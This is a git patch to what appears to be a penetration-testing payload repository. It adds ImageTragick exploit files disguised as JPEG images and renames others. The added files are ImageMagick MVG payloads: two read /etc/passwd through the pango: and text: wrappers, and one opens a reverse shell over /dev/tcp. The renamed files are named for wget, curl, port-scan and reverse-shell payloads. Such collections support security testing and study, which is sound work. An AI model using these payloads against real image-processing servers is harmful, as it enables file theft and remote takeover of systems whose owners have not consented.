From 43f8367df02f93a427aaba516a87f4f402ed0dbc Mon Sep 17 00:00:00 2001
From: Swissky <martopeer@gmail.com>
Date: Wed, 28 Jun 2017 10:33:57 +0200
Subject: [PATCH] Update Image Tragick payloads

---
 ...payload_imageover_file_exfiltration_pangu_wrapper.jpg | 5 +++++
 .../payload_imageover_file_exfiltration_text_wrapper.jpg | 5 +++++
 .../Image Tragik/payload_imageover_reverse_shell.jpg     | 9 +++++++++
 .../{payload_rce_wget.gif => payload_imageover_wget.gif} | 0
 .../{payload-http-log.png => payload_url_curl.png}       | 0
 ..._port_localhost_http.jpg => payload_url_portscan.jpg} | 0
 ..._connection.mvg => payload_url_remote_connection.mvg} | 0
 ...te_exec_command.mvg => payload_url_reverse_shell.mvg} | 0
 .../{payload_rce_touch.jpg => payload_url_touch.jpg}     | 0
 ...k_reverse_shell.xml => payload_xml_reverse_shell.xml} | 0
 10 files changed, 19 insertions(+)
 create mode 100644 Upload insecure files/Image Tragik/payload_imageover_file_exfiltration_pangu_wrapper.jpg
 create mode 100644 Upload insecure files/Image Tragik/payload_imageover_file_exfiltration_text_wrapper.jpg
 create mode 100644 Upload insecure files/Image Tragik/payload_imageover_reverse_shell.jpg
 rename Upload insecure files/Image Tragik/{payload_rce_wget.gif => payload_imageover_wget.gif} (100%)
 rename Upload insecure files/Image Tragik/{payload-http-log.png => payload_url_curl.png} (100%)
 rename Upload insecure files/Image Tragik/{detection_port_localhost_http.jpg => payload_url_portscan.jpg} (100%)
 rename Upload insecure files/Image Tragik/{payload_remote_connection.mvg => payload_url_remote_connection.mvg} (100%)
 rename Upload insecure files/Image Tragik/{payload_remote_exec_command.mvg => payload_url_reverse_shell.mvg} (100%)
 rename Upload insecure files/Image Tragik/{payload_rce_touch.jpg => payload_url_touch.jpg} (100%)
 rename Upload insecure files/Image Tragik/{image_magik_reverse_shell.xml => payload_xml_reverse_shell.xml} (100%)

diff --git a/Upload insecure files/Image Tragik/payload_imageover_file_exfiltration_pangu_wrapper.jpg b/Upload insecure files/Image Tragik/payload_imageover_file_exfiltration_pangu_wrapper.jpg
new file mode 100644
index 0000000..81e83f4
--- /dev/null
+++ b/Upload insecure files/Image Tragik/payload_imageover_file_exfiltration_pangu_wrapper.jpg	
@@ -0,0 +1,5 @@
+push graphic-context
+viewbox 0 0 640 480
+image over 0,0 0,0 'pango:@/etc/passwd'
+pop graphic-context
+
diff --git a/Upload insecure files/Image Tragik/payload_imageover_file_exfiltration_text_wrapper.jpg b/Upload insecure files/Image Tragik/payload_imageover_file_exfiltration_text_wrapper.jpg
new file mode 100644
index 0000000..5f5c97e
--- /dev/null
+++ b/Upload insecure files/Image Tragik/payload_imageover_file_exfiltration_text_wrapper.jpg	
@@ -0,0 +1,5 @@
+push graphic-context
+viewbox 0 0 640 480
+image over 0,0 0,0 'text:/etc/passwd'
+pop graphic-context
+
diff --git a/Upload insecure files/Image Tragik/payload_imageover_reverse_shell.jpg b/Upload insecure files/Image Tragik/payload_imageover_reverse_shell.jpg
new file mode 100644
index 0000000..7533ffb
--- /dev/null
+++ b/Upload insecure files/Image Tragik/payload_imageover_reverse_shell.jpg	
@@ -0,0 +1,9 @@
+push graphic-context
+encoding "UTF-8"
+viewbox 0 0 1 1
+affine 1 0 0 1 0 0
+push graphic-context
+image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
+pop graphic-context
+pop graphic-context
+
diff --git a/Upload insecure files/Image Tragik/payload_rce_wget.gif b/Upload insecure files/Image Tragik/payload_imageover_wget.gif
similarity index 100%
rename from Upload insecure files/Image Tragik/payload_rce_wget.gif
rename to Upload insecure files/Image Tragik/payload_imageover_wget.gif
diff --git a/Upload insecure files/Image Tragik/payload-http-log.png b/Upload insecure files/Image Tragik/payload_url_curl.png
similarity index 100%
rename from Upload insecure files/Image Tragik/payload-http-log.png
rename to Upload insecure files/Image Tragik/payload_url_curl.png
diff --git a/Upload insecure files/Image Tragik/detection_port_localhost_http.jpg b/Upload insecure files/Image Tragik/payload_url_portscan.jpg
similarity index 100%
rename from Upload insecure files/Image Tragik/detection_port_localhost_http.jpg
rename to Upload insecure files/Image Tragik/payload_url_portscan.jpg
diff --git a/Upload insecure files/Image Tragik/payload_remote_connection.mvg b/Upload insecure files/Image Tragik/payload_url_remote_connection.mvg
similarity index 100%
rename from Upload insecure files/Image Tragik/payload_remote_connection.mvg
rename to Upload insecure files/Image Tragik/payload_url_remote_connection.mvg
diff --git a/Upload insecure files/Image Tragik/payload_remote_exec_command.mvg b/Upload insecure files/Image Tragik/payload_url_reverse_shell.mvg
similarity index 100%
rename from Upload insecure files/Image Tragik/payload_remote_exec_command.mvg
rename to Upload insecure files/Image Tragik/payload_url_reverse_shell.mvg
diff --git a/Upload insecure files/Image Tragik/payload_rce_touch.jpg b/Upload insecure files/Image Tragik/payload_url_touch.jpg
similarity index 100%
rename from Upload insecure files/Image Tragik/payload_rce_touch.jpg
rename to Upload insecure files/Image Tragik/payload_url_touch.jpg
diff --git a/Upload insecure files/Image Tragik/image_magik_reverse_shell.xml b/Upload insecure files/Image Tragik/payload_xml_reverse_shell.xml
similarity index 100%
rename from Upload insecure files/Image Tragik/image_magik_reverse_shell.xml
rename to Upload insecure files/Image Tragik/payload_xml_reverse_shell.xml